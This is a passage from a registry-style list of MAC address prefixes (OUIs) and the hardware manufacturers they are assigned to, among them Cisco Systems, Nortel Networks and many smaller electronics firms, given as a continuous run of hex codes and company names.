Electronic Co, Ltd 0007CF Anoto AB 0007D2 Logopak Systeme GmbH & Co. KG 0007C9 Technol Seven Co., Ltd. 0007C7 Synectics Systems Limited 0007C3 Thomson 0007A5 Y.D.K Co. Ltd. 00079C Golden Electronics Technology Co., Ltd. 0007E4 SoftRadio Co., Ltd. 000754 Xyterra Computing, Inc. 000757 Topcall International AG 000753 Beijing Qxcomm Technology Co., Ltd. 00074C Beicom Inc. 00074D Zebra Technologies Corp. 000732 AAEON Technology Inc. 000725 Bematech International Corp. 000723 ELCON Systemtechnik GmbH 00071D Satelsa Sistemas Y Aplicaciones De Telecomunicaciones, S.A. 000720 Trutzschler GmbH & Co. KG 00076E Sinetica Corporation Limited 00076F Synoptics Limited 000773 Ascom Powerline Communications Ltd. 00076C Daehanet, Inc. 00075D Celleritas Inc. 00073F Woojyun Systec Co., Ltd. 000728 Neo Telecom 00072C Fabricom 00072D CNSystems 00072F Intransa, Inc. 000780 Bluegiga Technologies OY 000777 Motah Ltd. 000724 Telemax Co., Ltd. 00071B CDVI Americas Ltd 000715 General Research of Electronics, Inc. 000737 Soriya Co. Ltd. 000734 ONStor, Inc. 000765 Jade Quantum Technologies, Inc. 0005EA Rednix 0006C9 Technical Marketing Research, Inc. 0006C8 Sumitomo Metal Micro Devices, Inc. 0006F1 Optillion 0006A7 Primarion 0006A9 Universal Instruments Corp. 00069E UNIQA, Inc. 0006B1 Sonicwall 0006AD KB Electronics Ltd. 0006AF Xalted Networks 0006D7 Cisco Systems, Inc 0006D5 Diamond Systems Corp. 0006FD Comjet Information Systems Corp. 0006F9 Mitsui Zosen Systems Research Inc. 0006C0 United Internetworks, Inc. 0006E0 MAT Co., Ltd. 00D0B9 MICROTEK INTERNATIONAL, INC. 00D05F VALCOM, INC. 000675 Banderacom, Inc. 000698 egnite GmbH 00069C Transmode Systems AB 000643 SONO Computer Co., Ltd. 000649 3M Deutschland GmbH 00063E Opthos Inc. 00063B Arcturus Networks Inc. 00067B Toplink C&C Corporation 000670 Upponetti Oy 00066F Korea Data Systems 000668 Vicon Industries Inc. 00066D Compuprint S.P.A. 000626 MWE GmbH 000620 Serial System Ltd. 000618 DigiPower Manufacturing Inc. 000633 Cross Match Technologies GmbH 000686 ZARDCOM Co., Ltd. 000689 yLez Technologies Pte Ltd 000681 Goepel Electronic GmbH 000658 Helmut Fischer GmbH Institut für Elektronik und Messtechnik 0005D3 eProduction Solutions, Inc. 000604 @Track Communications, Inc. 000606 RapidWAN, Inc. 000603 Baker Hughes Inc. 000607 Omni Directional Control Technology Inc. 0005F7 Analog Devices, Inc. 00059C Kleinknecht GmbH, Ing. Büro 0005AE Mediaport USA 0005B0 Korea Computer Technology Co., Ltd. 0005B2 Medison Co., Ltd. 000597 Eagle Traffic Control Systems 0005B5 Broadcom Technologies 0005CB ROIS Technologies, Inc. 0005C8 VERYTECH 0005CD D&M Holdings Inc. 0005A2 CELOX Networks 0005AA Moore Industries International Inc. 0005E7 Netrake an AudioCodes Company 0005F4 System Base Co., Ltd. 0005E1 Trellis Photonics, Ltd. 0005E2 Creativ Network Technologies 000613 Kawasaki Microelectronics Incorporated 000617 Redswitch Inc. 000551 F & S Elektronik Systeme GmbH 00054D Brans Technologies, Inc. 000547 Starent Networks 00054E Philips 000546 KDDI Network & Solultions Inc. 000540 FAST Corporation 00053C XIRCOM 000544 Valley Technologies, Inc. 00052E Cinta Networks 00052F Leviton Network Solutions 00053B Harbour Networks Ltd., Co. Beijing 000528 New Focus, Inc. 00056B C.P. Technology Co., Ltd. 000560 LEADER COMM.CO., LTD 00055E Cisco Systems, Inc 000596 Genotech Co., Ltd. 000579 Universal Control Solution Corp. 00057F Acqis Technology 000573 Cisco Systems, Inc 000575 CDS-Electronics BV 000556 360 Systems 000559 Intracom S.A. 00058C Opentech Inc. 0004C9 Micro Electron Co., Ltd. 0004BE OptXCon, Inc. 0004C4 Audiotonix Group Limited 0004C1 Cisco Systems, Inc 0004D6 Takagi Industrial Co., Ltd. 0004D1 Drew Technologies, Inc. 0004D0 Softlink s.r.o. 008087 OKI ELECTRIC INDUSTRY CO., LTD 0004D9 Titan Electronics, Inc. 0004D8 IPWireless, Inc. 000524 BTL System (HK) Limited 000522 LEA*D Corporation, Inc. 000520 Smartronix, Inc. 0004EB Paxonet Communications, Inc. 0004EF Polestar Corp. 000514 KDT Systems Co., Ltd. 00050B SICOM Systems, Inc. 000505 Systems Integration Solutions, Inc. 0004FE Pelago Networks 000518 Jupiters Technology 0004B7 AMB i.t. Holding 0004B9 S.I. Soubou, Inc. 0004BB Bardac Corporation 0004BC Giantec, Inc. 0004AF Digital Fountain, Inc. 000456 Cambium Networks Limited 000458 Fusion X Co., Ltd. 00044F Schubert System Elektronik Gmbh 000446 CYZENTECH Co., Ltd. 00044A iPolicy Networks, Inc. 000440 cyberPIXIE, Inc. 00043C SONOS Co., Ltd. 0004B2 ESSEGI SRL 0004B4 CIAC 0004AD Malibu Networks 0004A9 SandStream Technologies, Inc. 000461 EPOX Computer Co., Ltd. 000462 DAKOS Data & Communication Co., Ltd. 00045F Avalue Technology, Inc. 00049C Surgient Networks, Inc. 00049D Ipanema Technologies 000460 Knilink Technology, Inc. 00048F TD Systems Corporation 000495 Tejas Networks India Limited 00046F Digitel S/A Industria Eletronica 000469 Innocom, Inc. 000487 Cogency Semiconductor, Inc. 000468 Vivity, Inc. 0003E1 Winmate Communication, Inc. 0003E4 Cisco Systems, Inc 0003DC Lexar Media, Inc. 0003D8 iMPath Networks, Inc. 0003D5 Advanced Communications Co., Ltd. 0003F7 Plast-Control GmbH 0003FC Intertex Data AB 0003EF Oneline AG 0003F1 Cicada Semiconductor, Inc. 000430 Netgem 00042C Minet, Inc. 00042A Wireless Networks, Inc. 00042B IT Access Co., Ltd. 0003D6 RADVision, Ltd. 0003D4 Alloptic, Inc. 0003CE ETEN Technologies, Inc. 0003C8 CML Emergency Services 0003C3 Micronik Multimedia 000419 Fibercycle Networks, Inc. 00041C ipDialog, Inc. 000418 Teltronic S.A.U. 000370 NXTV, Inc. 000402 Nexsan Technologies, Ltd. 0003ED Shinkawa Electric Co., Ltd. 0003BD OmniCluster Technologies, Inc. 0003C0 RFTNC Co., Ltd. 0003B8 NetKit Solutions, LLC 0003B7 ZACCESS Systems 0003A0 Cisco Systems, Inc 0003A2 Catapult Communications 00039C OptiMight Communications, Inc. 0003B0 Xsense Technology Corp. 0003AA Watlow 0003A8 IDOT Computers, Inc. 000355 TeraBeam Internet Systems 000369 Nippon Antenna Co., Ltd. 000373 Aselsan A.S 000377 Gigabit Wireless 000365 Kira Information & Communications, Ltd. 000385 Actelis Networks, Inc. 000354 Fiber Logic Communications 000350 BTICINO SPA 000351 Diebold, Inc. 00034E Pos Data Company, Ltd. 000348 Norscan Instruments, Ltd. 000346 Hitachi Kokusai Electric, Inc. 000344 Tietech.Co., Ltd. 0002E6 Gould Instrument Systems, Inc. 0002E4 JC HYUN Systems, Inc. 0002DE Astrodesign, Inc. 0002E2 NDC Infared Engineering 0002E1 Integrated Network Corporation 0002F7 ARM 00D024 Cognex Corporation 0002F1 Pinetron Co., Ltd. 0002ED DXO Telecom Co., Ltd. 0002EC Maschoff Design Engineering 000336 Zetes Technologies 000337 Vaone, Inc. 00033B TAMI Tech Co., Ltd. 00032D IBASE Technology, Inc. 00B052 Atheros Communications 000343 Martin Professional A/S 000335 Mirae Technology 0002F8 SEAKR Engineering, Inc. 000314 Teleware Network Systems 00032F Global Sun Technology, Inc. 0002DC Fujitsu General Limited 0002D7 EMPEG Ltd 0002D3 NetBotz, Inc. 0002DA ExiO Communications, Inc. 0002D4 PDA Peripherals, Inc. 0002D6 NICE Systems 00027D Cisco Systems, Inc 00027C Trilithic, Inc. 00028B VDSL Systems OY 00028C Micrel-Synergy Semiconductor 00028D Movita Technologies, Inc. 000298 Broadframe Corporation 000297 C-COR.net 000291 Open Network Co., Ltd. 0002C1 Innovative Electronic Designs, Inc. 0002C0 Bencent Tzeng Industry Co., Ltd. 000299 Apex, Inc. 000275 SMART Technologies, Inc. 0002C6 Data Track Technology PLC 0002A6 Effinet Systems Co., Ltd. 00025F Nortel Networks 00025C SCI Systems (Kunshan) Co., Ltd. 000087 HITACHI, LTD. 000258 Flying Packets Communications 00024E Datacard Group 000242 Videoframe Systems 000244 SURECOM Technology Co. 00023E Selta Telematica S.p.a 000241 Amer.com 000207 VisionGlobal Network Corp. 000208 Unify Networks, Inc. 000204 Bodmann Industries Elektronik GmbH 000229 Adtec Corporation 00022D Agere Systems 000226 XESystems, Inc. 000225 One Stop Systems 000211 Nature Worldwide Technology Corp. 000212 SierraCom 000217 Cisco Systems, Inc 00017A Chengdu Maipu Electric Industrial Co., Ltd. 000238 Serome Technology, Inc. 000269 Nadatel Co., Ltd 000264 AudioRamp.com 000255 IBM Corp 000252 Carrier Corporation 000220 CANON FINETECH INC. 00020D Micronpc.com 0001D4 Leisure Time, Inc. 0001DD Avail Networks 0001D5 HAEDONG INFO & COMM CO., LTD 0001D7 F5 Networks, Inc. 0001DE Trango Systems, Inc. 0001DC Activetelco 0001F9 TeraGlobal Communications Corp. 0001FB DoTop Technology, Inc. 0001F8 TEXIO TECHNOLOGY CORPORATION 0001BE Gigalink Co., Ltd. 0001B1 General Bandwidth 0001BF Teleforce Co., Ltd. 0001B4 Wayport, Inc. 0001BA IC-Net, Inc. 0001CF Alpha Data Parallel Systems, Ltd. 0001D0 VitalPoint, Inc. 0001B0 Fulltek Technology Co., Ltd. 0001A9 BMW AG 0001AA Airspan Communications, Ltd. 00019E ESS Technology, Inc. 00017D ThermoQuest 000181 Nortel Networks 000194 Capital Equipment Corporation 000198 Darim Vision 0001E8 Force10 Networks, Inc. 0001E9 Litton Marine Systems B.V. 0001E5 Supernet, Inc. 0001A2 Logical Co., Ltd. 000185 Hitachi Aloka Medical, Ltd. 0001C7 Cisco Systems, Inc 000121 WatchGuard Technologies, Inc. 000129 DFI Inc. 000119 RTUnet (Australia) 000122 Trend Communications, Ltd. 00011A Hoffmann und Burmeister GbR 00010A CIS TECHNOLOGY INC. 000167 HIOKI E.E. CORPORATION 000168 VITANA CORPORATION 000162 Cygnet Technologies, Inc. 000154 G3M Corporation 000152 CHROMATEK INC. 000150 GILAT COMMUNICATIONS, LTD. 000151 Ensemble Communications 000115 EXTRATECH CORPORATION 000101 Private 00010D Teledyne DALSA Inc. 000105 Beckhoff Automation GmbH 00B017 InfoGear Technology Corp. 00012C Aravox Technologies, Inc. 000142 Cisco Systems, Inc 000164 Cisco Systems, Inc 00015F DIGITAL DESIGN GmbH 00012B TELENET Co., Ltd. 00013F Neighbor World Co., Ltd. 000124 Acer Incorporated 003088 Ericsson 003020 TSI, Inc.. 003095 Procomp Informatics, Ltd. 0030CA Discovery Com 0030CE Zaffire 00307B Cisco Systems, Inc 0030B5 Tadiran Microwave Networks 0030B8 RiverDelta Networks 003071 Cisco Systems, Inc 00303A MAATEL 00304E BUSTEC PRODUCTION LTD. 0030A4 Woodwind Communications System 00303B PowerCom Technology 0030BC Optronic AG 00B02D ViaGate Technologies, Inc. 0030EE DSG Technology, Inc. 00309E WORKBIT CORPORATION. 0030DE WAGO Kontakttechnik GmbH 00303E Radcom Ltd. 0030D7 Innovative Systems, L.L.C. 00B0CE Viveris Technologies 00B01C Westport Technologies 00B04A Cisco Systems, Inc 00B048 Marconi Communications Inc. 00301B SHUTTLE, INC. 003021 HSING TECH. ENTERPRISE CO.,LTD 00302C SYLANTRO SYSTEMS CORPORATION 0030DF KB/TEL TELECOMUNICACIONES 003030 HARMONIX CORPORATION 003063 SANTERA SYSTEMS, INC. 0030A3 Cisco Systems, Inc 0030DD INDIGITA CORPORATION 003099 BOENIG UND KALLENBACH OHG 0030F2 Cisco Systems, Inc 003051 ORBIT AVIONIC & COMMUNICATION 00308E CROSS MATCH TECHNOLOGIES, INC. 003027 KERBANGO, INC. 003033 ORIENT TELECOM CO., LTD. 003008 AVIO DIGITAL, INC. 00301D SKYSTREAM, INC. 0030BA AC&T SYSTEM CO., LTD. 0030FD INTEGRATED SYSTEMS DESIGN 0030B9 ECTEL 00307D GRE AMERICA, INC. 0030EF NEON TECHNOLOGY, INC. 003096 Cisco Systems, Inc 003039 SOFTBOOK PRESS 00D0F8 FUJIAN STAR TERMINAL 00D0ED XIOX 00D097 Cisco Systems, Inc 00D08E Grass Valley, A Belden Brand 00D056 SOMAT CORPORATION 00D0E0 DOOIN ELECTRONICS CO. 00D000 FERRAN SCIENTIFIC, INC. 00D0D0 ZHONGXING TELECOM LTD. 00D053 CONNECTED SYSTEMS 00D033 DALIAN DAXIAN NETWORK 00D0D6 AETHRA TELECOMUNICAZIONI 00D063 Cisco Systems, Inc 00D047 XN TECHNOLOGIES 00D055 KATHREIN-WERKE KG 00D03B VISION PRODUCTS PTY. LTD. 00D0B3 DRS Technologies Canada Ltd 00D0AF CUTLER-HAMMER, INC. 00D052 ASCEND COMMUNICATIONS, INC. 00D0AD TL INDUSTRIES 00D0A4 ALANTRO COMMUNICATIONS 00D0B0 BITSWITCH LTD. 00D030 Safetran Systems Corp 00302A SOUTHERN INFORMATION 0030E1 Network Equipment Technologies, Inc. 00302B INALP NETWORKS, INC. 003001 SMP 00D08B ADVA Optical Networking Ltd. 00D0E4 Cisco Systems, Inc 00D05A SYMBIONICS, LTD. 00D079 Cisco Systems, Inc 00D021 REGENT ELECTRONICS CORP. 00D09F NOVTEK TEST SYSTEMS 00D0FE ASTRAL POINT 00D0D4 V-BITS, INC. 00D084 NEXCOMM SYSTEMS, INC. 00D099 Elcard Wireless Systems Oy 00D0E7 VCON TELECOMMUNICATION LTD. 00D01B MIMAKI ENGINEERING CO., LTD. 00D00D MICROMERITICS INSTRUMENT 00D054 SAS INSTITUTE INC. 00D009 HSING TECH. ENTERPRISE CO. LTD 00D0F4 CARINTHIAN TECH INSTITUTE 00D07D COSINE COMMUNICATIONS 00D083 INVERTEX, INC. 00D0BA Cisco Systems, Inc 00D098 Photon Dynamics Canada Inc. 00D0BE EMUTEC INC. 00D092 GLENAYRE WESTERN MULTIPLEX 00509D THE INDUSTREE B.V. 00D0B8 Iomega Corporation 0050CB JETTER 005058 Sangoma Technologies 005074 ADVANCED HI-TECH CORP. 00500A IRIS TECHNOLOGIES, INC. 00506D VIDEOJET SYSTEMS 0050CA NET TO NET TECHNOLOGIES 00D0C7 PATHWAY, INC. 00D07A AMAQUEST COMPUTER CORP. 00503F ANCHOR GAMES 005032 PICAZO COMMUNICATIONS, INC. 00D04A PRESENCE TECHNOLOGY GMBH 00D074 TAQUA SYSTEMS, INC. 00504D Tokyo Electron Device Limited 005070 CHAINTECH COMPUTER CO., LTD. 005023 PG DESIGN ELECTRONICS, INC. 00509E Les Technologies SoftAcoustik Inc. 005071 AIWA CO., LTD. 00505F BRAND INNOVATORS 0050B4 SATCHWELL CONTROL SYSTEMS, LTD 0050D6 ATLAS COPCO TOOLS AB 005082 FORESSON CORPORATION 0050DF AirFiber, Inc. 0050C5 ADS Technologies, Inc 00508E OPTIMATION, INC. 005028 AVAL COMMUNICATIONS 00502F TollBridge Technologies, Inc. 0050FE PCTVnet ASA 0050AB NALTEC, Inc. 005037 KOGA ELECTRONICS CO. 0050A8 OpenCon Systems, Inc. 00509C BETA RESEARCH 0050B1 GIDDINGS & LEWIS 005006 TAC AB 005009 PHILIPS BROADBAND NETWORKS 005030 FUTURE PLUS SYSTEMS 005078 MEGATON HOUSE, LTD. 005002 OMNISEC AG 00506A EDEVA, INC. 0050AA KONICA MINOLTA HOLDINGS, INC. 005038 DAIN TELECOM CO., LTD. 0050B7 BOSER TECHNOLOGY CO., LTD. 009088 BAXALL SECURITY LTD. 00906C Sartorius Hamburg GmbH 0090A4 ALTIGA NETWORKS 0090F9 Imagine Communications 009089 SOFTCOM MICROSYSTEMS, INC. 0090EE PERSONAL COMMUNICATIONS TECHNOLOGIES 009080 NOT LIMITED, INC. 0090E8 MOXA TECHNOLOGIES CORP., LTD. 0090A1 Flying Pig Systems/High End Systems Inc. 009079 ClearOne, Inc. 00909A ONE WORLD SYSTEMS, INC. 0090C2 JK microsystems, Inc. 0050D0 MINERVA SYSTEMS 0050D8 UNICORN COMPUTER CORP. 0050B2 BRODEL GmbH 009076 FMT AIRCRAFT GATE SUPPORT SYSTEMS AB 009017 Zypcom, Inc 009049 ENTRIDIA CORPORATION 0090E6 ALi Corporation 009070 NEO NETWORKS, INC. 009030 HONEYWELL-DATING 009008 HanA Systems Inc. 0090AC OPTIVISION, INC. 00904E DELEM BV 0090ED CENTRAL SYSTEM RESEARCH CO., LTD. 00901E Selesta Ingegneria S.p.A. 009075 NEC DO BRASIL S.A. 0090AD ASPECT ELECTRONICS, INC. 009001 NISHIMU ELECTRONICS INDUSTRIES CO., LTD. 009043 Tattile SRL 0090CB Wireless OnLine, Inc. 001063 STARGUIDE DIGITAL NETWORKS 001023 Network Equipment Technologies 00102B UMAX DATA SYSTEMS, INC. 00908A BAYLY COMMUNICATIONS, INC. 00900E HANDLINK TECHNOLOGIES, INC. 0090C1 Peco II, Inc. 00108D Johnson Controls, Inc. 001045 Nortel Networks 00107D AURORA COMMUNICATIONS, LTD. 0090E4 NEC AMERICA, INC. 009040 Siemens Network Convergence LLC 0090C8 WAVERIDER COMMUNICATIONS (CANADA) INC. 00901B DIGITAL CONTROLS 0090F7 NBASE COMMUNICATIONS LTD. 009012 GLOBESPAN SEMICONDUCTOR, INC. 0090B7 DIGITAL LIGHTWAVE, INC. 0090A0 8X8 INC. 009047 GIGA FAST E. LTD. 0090E1 TELENA S.P.A. 009032 PELCOMBE GROUP LTD. 001062 NX SERVER, ILNC. 0010F0 RITTAL-WERK RUDOLF LOH GmbH & Co. 001001 Citel 00105C QUANTUM DESIGNS (H.K.) LTD. 0010CF FIBERLANE COMMUNICATIONS 001069 HELIOSS COMMUNICATIONS, INC. 0010BF InterAir Wireless 001026 ACCELERATED NETWORKS, INC. 001036 INTER-TEL INTEGRATED SYSTEMS 001039 Vectron Systems AG 0010B6 ENTRATA COMMUNICATIONS CORP. 0010EC RPCG, LLC 001059 DIABLO RESEARCH CO. LLC 0010FC BROADBAND NETWORKS, INC. 001031 OBJECTIVE COMMUNICATIONS, INC. 00106D Axxcelera Broadband Wireless 00104C Teledyne LeCroy, Inc 0010CC CLP COMPUTER LOGISTIK PLANUNG GmbH 001030 EION Inc. 0010D0 WITCOM, LTD. 001093 CMS COMPUTERS, LTD. 00108F RAPTOR SYSTEMS 0010A4 XIRCOM 0010F1 I-O CORPORATION 001066 ADVANCED CONTROL SYSTEMS, INC. 0010AC IMCI TECHNOLOGIES 0010B1 FOR-A CO., LTD. 0010EE CTI PRODUCTS, INC. 001041 BRISTOL BABCOCK, INC. 0010AA MEDIA4, INC. 0010E8 TELOCITY, INCORPORATED 0010A2 TNS 001065 RADYNE CORPORATION 00109F PAVO, INC. 00101D WINBOND ELECTRONICS CORP. 001084 K-BOT COMMUNICATIONS 001000 CABLE TELEVISION LABORATORIES, INC. 001009 HORANET 0010F8 TEXIO TECHNOLOGY CORPORATION 0010C0 ARMA, Inc. 00105B NET INSIGHT AB 001002 ACTIA 0010EB SELSIUS SYSTEMS, INC. 001057 Rebel.com, Inc. 0010F9 UNIQUE SYSTEMS, INC. 001075 Segate Technology LLC 00E003 NOKIA WIRELESS BUSINESS COMMUN 00E0F3 WebSprint Communications, Inc. 08BBCC AK-NORD EDV VERTRIEBSGES. mbH 00E0DB ViaVideo Communications, Inc. 00E0A6 TELOGY NETWORKS, INC. 00E09F PIXEL VISION 00E0CC HERO SYSTEMS, LTD. 00E080 CONTROL RESOURCES CORPORATION 00E004 PMC-SIERRA, INC. 00E03B PROMINET CORPORATION 00E0F5 TELES AG 00E0D7 SUNSHINE ELECTRONICS, INC. 00E0B5 ARDENT COMMUNICATIONS CORP. 00E068 MERRIMAC SYSTEMS INC. 00E049 MICROWI ELECTRONIC GmbH 00E095 ADVANCED-VISION TECHNOLGIES CORP. 00E00E AVALON IMAGING SYSTEMS, INC. 00E048 SDL COMMUNICATIONS, INC. 00E0CB RESON, INC. 00E0C8 VIRTUAL ACCESS, LTD. 00E006 SILICON INTEGRATED SYS. CORP. 00E0AC MIDSCO, INC. 00E008 AMAZING CONTROLS! INC. 00E0AE XAQTI CORPORATION 00E0E0 SI ELECTRONICS, LTD. 00E050 EXECUTONE INFORMATION SYSTEMS, INC. 00E023 TELRAD 00E02C AST COMPUTER 00E067 eac AUTOMATION-CONSULTING GmbH 00E0FA TRL TECHNOLOGY, LTD. 00E02A TANDBERG TELEVISION AS 00E04E SANYO DENKI CO., LTD. 00E012 PLUTO TECHNOLOGIES INTERNATIONAL INC. 00E04C REALTEK SEMICONDUCTOR CORP. 00E051 TALX CORPORATION 00606B Synclayer Inc. 00603B AMTEC spa 00E039 PARADYNE CORP. 00600B LOGWARE GmbH 00E0C7 EUROTECH SRL 00E0AF GENERAL DYNAMICS INFORMATION SYSTEMS 00E054 KODAI HITEC CO., LTD. 00E0B9 BYAS SYSTEMS 00604B Safe-com GmbH & Co. KG 00E0EF DIONEX 00E02D InnoMediaLogic, Inc. 00E035 Artesyn Embedded Technologies 00E090 BECKMAN LAB. AUTOMATION DIV. 006001 InnoSys, Inc. 0060FE LYNX SYSTEM DEVELOPERS, INC. 0060BD Enginuity Communications 000800 MULTITECH SYSTEMS, INC. 00E085 GLOBAL MAINTECH, INC. 00E0BE GENROCO INTERNATIONAL, INC. 00E0B6 Entrada Networks 00E0F4 INSIDE Technology A/S 00E0A0 WILTRON CO. 00E0F1 THAT CORPORATION 0060D5 AMADA MIYACHI Co., Ltd 00603F PATAPSCO DESIGNS 0060B5 KEBA GmbH 006014 EDEC CO., LTD. 0060AC RESILIENCE CORPORATION 00604E CYCLE COMPUTER CORPORATION, INC. 0060E1 ORCKIT COMMUNICATIONS LTD. 0060D2 LUCENT TECHNOLOGIES TAIWAN TELECOMMUNICATIONS CO., LTD. 006042 TKS (USA), INC. 006079 Mainstream Data, Inc. 00609A NJK TECHNO CO. 00602B PEAK AUDIO 0060F1 EXP COMPUTER, INC. 0060E6 SHOMITI SYSTEMS INCORPORATED 0060FF QuVis, Inc. 006067 ACER NETXUS INC. 00609F PHAST CORPORATION 006040 NETRO CORP. 0060CC EMTRAK, INCORPORATED 00602C LINX Data Terminals, Inc. 00607E GIGALABS, INC. 0060CD VideoServer, Inc. 0060AA INTELLIGENT DEVICES INC. (IDI) 006025 ACTIVE IMAGING PLC 0060A7 MICROSENS GmbH & CO. KG 0005A8 WYLE ELECTRONICS 0060E5 FUJI AUTOMATION CO., LTD. 00605E LIBERTY TECHNOLOGY NETWORKING 0060C6 DCS AG 00601E SOFTLAB, INC. 006065 BERNECKER & RAINER INDUSTRIE-ELEKTRONIC GmbH 00605D SCANIVALVE CORP. 00606F CLARION CORPORATION OF AMERICA 00A010 SYSLOGIC DATENTECHNIK AG 00A059 HAMILTON HALLMARK 00A039 ROSS TECHNOLOGY, INC. 00A0AD MARCONI SPA 00A0D6 SBE, Inc. 00A02E BRAND COMMUNICATIONS, LTD. 00604A SAIC IDEAS GROUP 00A0BD I-TECH CORP. 006090 Artiza Networks Inc 00600D Digital Logic GmbH 006030 VILLAGE TRONIC ENTWICKLUNG 00A08D JACOMO CORPORATION 00A08E Check Point Software Technologies 00A0FC IMAGE SCIENCES, INC. 00A09C Xyplex, Inc. 00A00D THE PANDA PROJECT 00A0E9 ELECTRONIC RETAILING SYSTEMS INTERNATIONAL 00A0BE INTEGRATED CIRCUIT SYSTEMS, INC. COMMUNICATIONS GROUP 00A016 MICROPOLIS CORP. 00A048 QUESTECH, LTD. 00A003 Siemens Switzerland Ltd., I B T HVP 00A0F9 BINTEC COMMUNICATIONS GMBH 00A0F5 RADGUARD LTD. 00A0CA FUJITSU DENSO LTD. 00A022 CENTRE FOR DEVELOPMENT OF ADVANCED COMPUTING 00A0B6 SANRITZ AUTOMATION CO., LTD. 00A079 ALPS ELECTRIC (USA), INC. 00A0C0 DIGITAL LINK CORP. 00A01E EST CORPORATION 00A0AE NUCOM SYSTEMS, INC. 00A062 AES PRODATA 00A076 CARDWARE LAB, INC. 00A0A1 EPIC DATA INC. 00A044 NTT IT CO., LTD. 00A011 MUTOH INDUSTRIES LTD. 00A0BA PATTON ELECTRONICS CO. 00A0B5 3H TECHNOLOGY 00A04D EDA INSTRUMENTS, INC. 00A086 AMBER WAVE SYSTEMS, INC. 00A0AF WMS INDUSTRIES 00A057 LANCOM Systems GmbH 00A030 CAPTOR NV/SA 00A0DE YAMAHA CORPORATION 00A084 Dataplex Pty Ltd 00A049 DIGITECH INDUSTRIES, INC. 00A09D JOHNATHON FREEMAN TECHNOLOGIES 00A06B DMS DORSCH MIKROSYSTEM GMBH 00A0F8 Zebra Technologies Inc 00A09F COMMVISION CORP. 00A06E AUSTRON, INC. 002022 NMS Communications 0020AE ORNET DATA COMMUNICATION TECH. 0020AA Ericsson Television Limited 0020A4 MULTIPOINT NETWORKS 000267 NODE RUNNER, INC. 0020B1 COMTECH RESEARCH INC. 002032 ALCATEL TAISEL 0020E9 DANTEL 002038 VME MICROSYSTEMS INTERNATIONAL CORPORATION 0020A3 Harmonic, Inc 002059 MIRO COMPUTER PRODUCTS AG 002034 ROTEC INDUSTRIEAUTOMATION GMBH 002079 MIKRON GMBH 002005 SIMPLE TECHNOLOGY 002018 CIS TECHNOLOGY INC. 002098 HECTRONIC AB 0020FD ITV TECHNOLOGIES, INC. 0020FA GDE SYSTEMS, INC. 0020C1 SAXA, Inc. 002080 SYNERGY (UK) LTD. 00C023 TUTANKHAMON ELECTRONICS 00C08B RISQ MODULAR SYSTEMS, INC. 0020C4 INET,INC. 002074 SUNGWOON SYSTEMS 00203C EUROTIME AB 002028 WEST EGG SYSTEMS, INC. 002068 ISDYNE 0020C8 LARSCOM INCORPORATED 00209D LIPPERT AUTOMATIONSTECHNIK 00209C PRIMARY ACCESS CORP. 00206D DATA RACE, INC. 00203A DIGITAL BI0METRICS INC. 002048 Marconi Communications 0020DC DENSITRON TAIWAN LTD. 00200C ADASTRA SYSTEMS CORP. 002011 CANOPUS CO., LTD. 002051 Verilink Corporation 00203B WISDM LTD. 0020BA CENTER FOR HIGH PERFORMANCE 0020F5 PANDATEL AG 00200E NSSLGlobal Technologies AS 0020E7 B&W NUCLEAR SERVICE COMPANY 0020F0 UNIVERSAL MICROELECTRONICS CO. 002089 T3PLUS NETWORKING, INC. 002061 GarrettCom, Inc. 00C080 NETSTAR, INC. 00C0B4 MYSON TECHNOLOGY, INC. 00C045 ISOLATION SYSTEMS, LTD. 0070B3 DATA RECALL LTD. 0070B0 M/A-COM INC. COMPANIES 00E6D3 NIXDORF COMPUTER CORP. 00C0C3 ACUSON COMPUTED SONOGRAPHY 00C0B3 COMSTAT DATACOMM CORPORATION 00C0E5 GESPAC, S.A. 00C04D MITEC, INC. 00C047 UNIMICRO SYSTEMS, INC. 00C084 DATA LINK CORP. LTD. 00C041 DIGITAL TRANSMISSION SYSTEMS 00C01F S.E.R.C.E.L. 006086 LOGIC REPLACEMENT TECH. LTD. 00C059 DENSO CORPORATION 00C0F1 SHINKO ELECTRIC CO., LTD. 00C0A1 TOKYO DENSHI SEKEI CO. 00C02E NETWIZ 00C00D ADVANCED LOGIC RESEARCH, INC. 00C081 METRODATA LTD. 00C03B MULTIACCESS COMPUTING CORP. 00C082 MOORE PRODUCTS CO. 00C099 YOSHIKI INDUSTRIAL CO.,LTD. 00C001 DIATEK PATIENT MANAGMENT 00C0F4 INTERLINK SYSTEM CO., LTD. 00C0E2 CALCOMP, INC. 00C07B ASCEND COMMUNICATIONS, INC. 00C03C TOWER TECH S.R.L. 00C01D GRAND JUNCTION NETWORKS, INC. 00C035 QUINTAR COMPANY 00C070 SECTRA SECURE-TRANSMISSION AB 00C06D BOCA RESEARCH, INC. 00C0EA ARRAY TECHNOLOGY LTD. 00C009 KT TECHNOLOGY (S) PTE LTD 00C0D6 J1 SYSTEMS, INC. 00C0DC EOS TECHNOLOGIES, INC. 00C072 KNX LTD. 00C0AE TOWERCOM CO. INC. DBA PC HOUSE 00C0C2 INFINITE NETWORKS LTD. 00C0AF TEKLOGIX INC. 00C07A PRIVA B.V. 00C0F6 CELAN TECHNOLOGY INC. 00C0F8 ABOUT COMPUTING INC. 00C078 COMPUTER SYSTEMS ENGINEERING 00C09A PHOTONICS CORPORATION 00C01A COROMETRICS MEDICAL SYSTEMS 00C068 HME Clear-Com LTD. 00C0D8 UNIVERSAL DATA SYSTEMS 004036 Zoom Telephonics, Inc 004016 ADC - Global Connectivity Solutions Division 00406A KENTEK INFORMATION SYSTEMS,INC 00400A PIVOTAL TECHNOLOGIES, INC. 004099 NEWGEN SYSTEMS CORP. 004011 ANDOVER CONTROLS CORPORATION 0040A1 ERGO COMPUTING 004081 MANNESMANN SCANGRAPHIC GMBH 00C08C PERFORMANCE TECHNOLOGIES, INC. 00C007 PINNACLE DATA SYSTEMS, INC. 00C098 CHUNTEX ELECTRONIC CO., LTD. 00C0BE ALCATEL - SEL 00C06E HAFT TECHNOLOGY, INC. 00C08A Lauterbach GmbH 00C0F7 ENGAGE COMMUNICATION, INC. 0040B7 STEALTH COMPUTER SYSTEMS 0040AC SUPER WORKSTATION, INC. 10005A IBM Corp 0040D1 FUKUDA DENSHI CO., LTD. 004069 LEMCOM SYSTEMS, INC. 00403B SYNERJET INTERNATIONAL CORP. 00803B APT COMMUNICATIONS, INC. 00806A ERI (EMPAC RESEARCH INC.) 00C0A8 GVC CORPORATION 0040E0 ATOMWIDE LTD. 0040A8 IMF INTERNATIONAL LTD. 004070 INTERWARE CO., LTD. 00408A TPS TELEPROCESSING SYS. GMBH 0040FD LXE 00403F 